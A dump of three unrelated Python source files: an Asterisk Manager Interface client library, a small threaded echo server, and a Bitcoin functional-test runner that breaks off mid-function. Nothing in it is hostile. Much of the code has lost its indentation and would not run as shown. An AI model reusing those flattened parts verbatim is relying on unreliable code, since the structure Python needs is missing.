class Event(_Message):
"""Manager interface Events, __init__ expects and 'Event' message"""
def __init__(self, message):
super(Event, self).__init__()
# store all of the event data
self.message = message
self.data = message.data
self.headers = message.headers
self.multiheaders = message.multiheaders
# if this is not an event message we have a problem
if not message.has_header('Event'):
raise ManagerException('Trying to create event from non event message')
# get the event name
self.name = message.get_header('Event')
def __repr__(self):
return self.headers['Event']
def get_action_id(self):
return self.headers.get('ActionID', 0000)
class Manager(object):
"""Manager interface.
Queue :attr:`errors_in_threads` stores messages about errors that
happened in threads execution. Because there is no point in raising
exceptions in threads, this is a way of letting the users of this
class know that something bad has happened.
.. warning::
Errors happening in threads must be logged **and** a corresponding
message added to :attr:`errors_in_threads`.
"""
def __init__(self):
self._sock = None # our socket
self.title = None # set by received greeting
self._connected = threading.Event()
self._running = threading.Event()
# our hostname
self.hostname = socket.gethostname()
# pid -- used for unique naming of ActionID
self.pid = os.getpid()
# our queues
self._message_queue = queue.Queue()
self._response_queue = queue.Queue()
self._event_queue = queue.Queue()
self.errors_in_threads = queue.Queue()
# callbacks for events
self._event_callbacks = {}
self._response_waiters = [] # those who are waiting for a response
# sequence stuff
self._seqlock = threading.Lock()
self._seq = 0
# some threads
self.message_thread = threading.Thread(target=self.message_loop)
self.event_dispatch_thread = threading.Thread(target=self.event_dispatch)
# TODO: this can be passed when threads are created
self.message_thread.setDaemon(True)
self.event_dispatch_thread.setDaemon(True)
# special sentinel value: when placed in a queue, its consumers
# know they have to terminate
self._sentinel = object()
def __del__(self):
self.close()
def is_connected(self):
"""
Check if we are connected or not.
"""
return self._connected.isSet()
# backwards compatibility
connected = is_connected
def is_running(self):
"""Return whether we are running or not."""
return self._running.isSet()
def next_seq(self):
"""Return the next number in the sequence, this is used for ActionID"""
self._seqlock.acquire()
try:
return self._seq
finally:
self._seq += 1
self._seqlock.release()
def send_action(self, cdict=None, **kwargs):
"""
Send a command to the manager
If a list is passed to the cdict argument, each item in the list will
be sent to asterisk under the same header in the following manner:
cdict = {"Action": "Originate",
"Variable": ["var1=value", "var2=value"]}
send_action(cdict)
...
Action: Originate
Variable: var1=value
Variable: var2=value
"""
cdict = cdict or {}
if not self.is_connected():
raise ManagerException("Not connected")
# fill in our args
cdict.update(kwargs)
# set the action id
if 'ActionID' not in cdict:
cdict['ActionID'] = '%s-%04s-%08x' % (
self.hostname, self.pid, self.next_seq())
clist = []
# generate the command
for key, value in cdict.items():
if isinstance(value, list):
for item in value:
item = tuple([key, item])
clist.append('%s: %s' % item)
else:
item = tuple([key, value])
clist.append('%s: %s' % item)
clist.append(EOL)
command = EOL.join(clist)
# lock the socket and send our command
try:
self._sock.write(command.encode('utf-8'))
self._sock.flush()
logger.debug("Wrote to socket file this command:\n%s" % command)
except socket.error as err:
# socket.error is OSError on Python 3 and cannot be unpacked directly
raise ManagerSocketException(err.errno, err.strerror)
self._response_waiters.insert(0, 1)
response = self._response_queue.get()
self._response_waiters.pop(0)
# if we got the sentinel value as a response we are done
if response is self._sentinel:
raise ManagerSocketException(0, 'Connection Terminated')
return response
def _receive_data(self):
"""
Read the response from a command.
"""
multiline = False
wait_for_marker = False
eolcount = 0
# loop while we are still running and connected
while self.is_running() and self.is_connected():
try:
lines = []
for line in self._sock:
line = line.decode('utf-8')
# check to see if this is the greeting line
if not self.title and '/' in line and ':' not in line:
# store the title of the manager we are connecting to:
self.title = line.split('/')[0].strip()
# store the version of the manager we are connecting to:
self.version = line.split('/')[1].strip()
# fake message header
lines.append('Response: Generated Header\r\n')
lines.append(line)
logger.debug("Fake message header. Will exit the "
"socket file iteration loop")
break
# If the line is EOL marker we have a complete message.
# Some commands are broken and contain a \n\r\n
# sequence, in the case wait_for_marker is set, we
# have such a command where the data ends with the
# marker --END COMMAND--, so we ignore embedded
# newlines until we see that marker
if line == EOL and not wait_for_marker:
multiline = False
# we split the break conditions because they are of very
# different nature and we'd like more fine-grained logs
if lines:
logger.debug("Have %s lines. Will exit the socket "
"file iteration loop" % len(lines))
break
if not self.is_connected():
logger.warning("Not connected. Will exit the "
"socket file iteration loop")
break
# ignore empty lines at start
continue
lines.append(line)
# line not ending in \r\n or without ':' isn't a
# valid header and starts multiline response
if not line.endswith('\r\n') or ':' not in line:
multiline = True
# Response: Follows indicates we should wait for end
# marker --END COMMAND--
if (not multiline and line.startswith('Response') and
line.split(':', 1)[1].strip() == 'Follows'):
wait_for_marker = True
# same when seeing end of multiline response
if multiline and line.startswith('--END COMMAND--'):
wait_for_marker = False
multiline = False
if not self.is_connected():
logger.info("Not connected. Will exit the "
"socket file iteration loop")
break
else:
# EOF during reading
logger.error("Problem reading socket file")
self._sock.close()
logger.info("Closed socket file")
self._connected.clear()
# if we have a message append it to our queue
# else notify `message_loop` that it has to finish
if lines:
if self.is_connected():
self._message_queue.put(lines)
else:
msg = "Received lines but are not connected"
logger.warning(msg)
self._message_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
else:
msg = "No lines received"
logger.warning(msg)
self._message_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
except socket.error:
msg = "Socket error"
logger.exception(msg)
self._sock.close()
logger.info("Closed socket file")
self._connected.clear()
# notify `message_loop` that it has to finish
self._message_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
def register_event(self, event, function):
"""
Register a callback for the specified event.
If a callback function returns True, no more callbacks for that
event will be executed.
"""
# get the current value, or an empty list
# then add our new callback
current_callbacks = self._event_callbacks.get(event, [])
current_callbacks.append(function)
self._event_callbacks[event] = current_callbacks
def unregister_event(self, event, function):
"""
Unregister a callback for the specified event.
"""
current_callbacks = self._event_callbacks.get(event, [])
current_callbacks.remove(function)
self._event_callbacks[event] = current_callbacks
def message_loop(self):
"""
The method for the event thread.
This actually receives all types of messages and places them
in the proper queues.
"""
# start a thread to receive data
t = threading.Thread(target=self._receive_data)
t.setDaemon(True)
t.start()
try:
# loop getting messages from the queue
while self.is_running():
# get/wait for messages
data = self._message_queue.get()
# if we got the sentinel value as our message we are done
# (have to notify `_event_queue` once, and `_response_queue`
# as many times as the length of `_response_waiters`)
if data is self._sentinel:
logger.info("Got sentinel object. Will notify the other "
"queues and then break this loop")
# notify `event_dispatch` that it has to finish
self._event_queue.put(self._sentinel)
for waiter in self._response_waiters:
self._response_queue.put(self._sentinel)
break
# parse the data
message = ManagerMessage(data)
# check if this is an event message
if message.has_header('Event'):
self._event_queue.put(Event(message))
# check if this is a response
elif message.has_header('Response'):
self._response_queue.put(message)
else:
# notify `_response_queue`'s consumer (`send_action`)
# that it has to finish
msg = "No clue what we got\n%s" % message.data
logger.error(msg)
self._response_queue.put(self._sentinel)
self.errors_in_threads.put(msg)
except Exception:
logger.exception("Exception in the message loop")
six.reraise(*sys.exc_info())
finally:
# wait for our data receiving thread to exit
logger.debug("Waiting for our data-receiving thread to exit")
t.join()
def event_dispatch(self):
"""This thread is responsible for dispatching events"""
# loop dispatching events
while self.is_running():
# get/wait for an event
ev = self._event_queue.get()
# if we got the sentinel value as an event we are done
if ev is self._sentinel:
logger.info("Got sentinel object. Will break dispatch loop")
break
# dispatch our events
# first build a list of the functions to execute
callbacks = (self._event_callbacks.get(ev.name, []) +
self._event_callbacks.get('*', []))
# now execute the functions
for callback in callbacks:
if callback(ev, self):
break
def connect(self, host, port=5038):
"""Connect to the manager interface"""
if self.is_connected():
raise ManagerException('Already connected to manager')
# make sure host is a string
assert isinstance(host, six.string_types)
port = int(port) # make sure port is an int
# create our socket and connect
try:
_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_sock.connect((host, port))
self._sock = _sock.makefile(mode='rwb')
_sock.close()
except socket.error as err:
# socket.error is OSError on Python 3 and cannot be unpacked directly
raise ManagerSocketException(err.errno, err.strerror)
# we are connected and running
self._connected.set()
self._running.set()
# start the event thread
self.message_thread.start()
# start the event dispatching thread
self.event_dispatch_thread.start()
# get our initial connection response
response = self._response_queue.get()
# if we got the sentinel value as a response then something went awry
if response is self._sentinel:
raise ManagerSocketException(0, "Connection Terminated")
return response
def close(self):
"""Shutdown the connection to the manager"""
# if we are still running, logout
if self.is_running() and self.is_connected():
logger.debug("Logoff before closing (we are running and connected)")
self.logoff()
if self.is_running():
# notify `message_loop` that it has to finish
logger.debug("Notify message loop that it has to finish")
self._message_queue.put(self._sentinel)
# wait for the event thread to exit
logger.debug("Waiting for `message_thread` to exit")
self.message_thread.join()
# make sure we do not join our self (when close is called from event handlers)
if threading.currentThread() != self.event_dispatch_thread:
# wait for the dispatch thread to exit
logger.debug("Waiting for `event_dispatch_thread` to exit")
self.event_dispatch_thread.join()
self._running.clear()
# Manager actions
def login(self, username, secret):
"""Login to the manager, throws ManagerAuthException when login falis.
:return: action response
"""
cdict = {
'Action': 'Login',
'Username': username,
'Secret': secret,
}
response = self.send_action(cdict)
if response.get_header('Response') == 'Error':
raise ManagerAuthException(response.get_header('Message'))
return response
def ping(self):
"""Send a ping action to the manager.
:return: action response
"""
cdict = {'Action': 'Ping'}
return self.send_action(cdict)
def logoff(self):
"""Logoff from the manager.
:return: action response
"""
cdict = {'Action': 'Logoff'}
return self.send_action(cdict)
def hangup(self, channel):
"""Hangup the specified channel.
:return: action response
"""
cdict = {
'Action': 'Hangup',
'Channel': channel,
}
return self.send_action(cdict)
def status(self, channel=''):
"""Get a status message from asterisk.
:return: action response
"""
cdict = {
'Action': 'Status',
'Channel': channel,
}
return self.send_action(cdict)
def redirect(self, channel, exten, priority='1', extra_channel='', context=''):
"""Redirect a channel.
:return: action response
"""
cdict = {
'Action': 'Redirect',
'Channel': channel,
'Exten': exten,
'Priority': priority,
}
if context:
cdict['Context'] = context
if extra_channel:
cdict['ExtraChannel'] = extra_channel
return self.send_action(cdict)
def originate(self, channel, exten, context='', priority='', timeout='',
caller_id='', run_async=False, account='', variables=None):
"""Originate a call.
:return: action response
"""
variables = variables or {}
cdict = {
'Action': 'Originate',
'Channel': channel,
'Exten': exten,
}
if context:
cdict['Context'] = context
if priority:
cdict['Priority'] = priority
if timeout:
cdict['Timeout'] = timeout
if caller_id:
cdict['CallerID'] = caller_id
if run_async:  # renamed from 'async', which is a reserved word in Python 3.7+
cdict['Async'] = 'yes'
if account:
cdict['Account'] = account
if variables:
cdict['Variable'] = ['='.join((str(key), str(value)))
for key, value in variables.items()]
return self.send_action(cdict)
def mailbox_status(self, mailbox):
"""Get the status of the specfied mailbox.
:return: action response
"""
cdict = {
'Action': 'MailboxStatus',
'Mailbox': mailbox,
}
return self.send_action(cdict)
def command(self, command):
"""Execute a command.
:return: action response
"""
cdict = {
'Action': 'Command',
'Command': command,
}
return self.send_action(cdict)
def extension_state(self, exten, context):
"""Get the state of an extension.
:return: action response
"""
cdict = {
'Action': 'ExtensionState',
'Exten': exten,
'Context': context,
}
return self.send_action(cdict)
def playdtmf(self, channel, digit):
"""Plays a dtmf digit on the specified channel.
:return: action response
"""
cdict = {
'Action': 'PlayDTMF',
'Channel': channel,
'Digit': digit,
}
return self.send_action(cdict)
def absolute_timeout(self, channel, timeout):
"""Set an absolute timeout on a channel.
:return: action response
"""
cdict = {
'Action': 'AbsoluteTimeout',
'Channel': channel,
'Timeout': timeout,
}
return self.send_action(cdict)
def mailbox_count(self, mailbox):
cdict = {
'Action': 'MailboxCount',
'Mailbox': mailbox,
}
return self.send_action(cdict)
def sippeers(self):
cdict = {'Action': 'Sippeers'}
return self.send_action(cdict)
def sipshowpeer(self, peer):
cdict = {
'Action': 'SIPshowpeer',
'Peer': peer,
}
return self.send_action(cdict)
class ManagerException(Exception):
pass
class ManagerSocketException(ManagerException):
pass
class ManagerAuthException(ManagerException):
pass
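# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, never-invoked example assuming a reachable Asterisk manager at the
# hypothetical host 'pbx.example.com' with hypothetical credentials. It shows
# that a callback returning True stops further callbacks for that event (see
# event_dispatch above) and that list values are expanded into repeated headers
# by send_action().
def _log_shutdown(event, manager):
    logger.info("Saw event %s", event.name)
    return True  # swallow the event: the '*' catch-all will not run for it

def _catch_all(event, manager):
    logger.debug("Unhandled event %s", event.name)

def example_session():
    manager = Manager()
    manager.connect('pbx.example.com')
    manager.login('admin', 'secret')
    manager.register_event('Shutdown', _log_shutdown)
    manager.register_event('*', _catch_all)
    # The 'Variable' list becomes two 'Variable:' header lines on the wire
    manager.send_action({'Action': 'Originate',
                         'Channel': 'SIP/1000',
                         'Exten': '2000',
                         'Context': 'default',
                         'Variable': ['caller=demo', 'retries=2']})
    manager.logoff()
    manager.close()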
|
server.py
|
#!/usr/bin/env python3
# A simple threaded echo server: each accepted client is handled in its own thread.
from threading import Thread
import time
from socket import socket, AF_INET, SOCK_STREAM

host = ''
port = 50007
sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.bind((host, port))
sockobj.listen(5)

def now():
    return time.ctime(time.time())

def handleClient(connection):
    # Sleep so it is visible that several clients are served concurrently.
    time.sleep(5)
    while True:
        data = connection.recv(1024)
        if not data:
            break
        reply = 'Reply => %s at %s' % (data.decode(), now())
        connection.send(reply.encode())
    connection.close()

def main():
    while True:
        connection, address = sockobj.accept()
        print("Server is connected to %s at %s" % (address, now()))
        t = Thread(target=handleClient, args=(connection,))
        t.start()

main()
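# --- Illustrative client sketch (not part of the original file) ---
# A minimal client for the echo server above, assuming the server is running on
# localhost:50007 in a separate process. It is commented out because main()
# above blocks forever, so nothing placed after it in this file would execute.
#
# from socket import socket, AF_INET, SOCK_STREAM
#
# def client(messages):
#     s = socket(AF_INET, SOCK_STREAM)
#     s.connect(('localhost', 50007))
#     for msg in messages:
#         s.send(msg.encode())
#         print(s.recv(1024).decode())   # prints 'Reply => <msg> at <timestamp>'
#     s.close()
#
# client(['hello', 'world'])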
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testName --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status, int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-ju',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub("\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub("\.py$", "", t) +
".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Use and update timings from build_dir only if separate
# build directory is used. We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings, build_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitoutput,
tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = [os.path.join("--srcdir={}".format(build_dir), "src")] + args
flags.append("--cachedir={}".format(cache_dir))
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output(
[os.path.join(tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except Exception as e:
print(e.output)
raise e
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name, runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=lambda result: result.name.lower())
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test scripts from the script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings, build_timings=None):
"""
Returns only tests that will not run longer than the cutoff.
Long-running tests are returned first to favor running tests in parallel.
Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
if build_timings is not None:
timing = next(
(x['time'] for x in build_timings.existing_timings if x['name'] == test), None)
if timing is not None:
return timing
# try source directory. Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
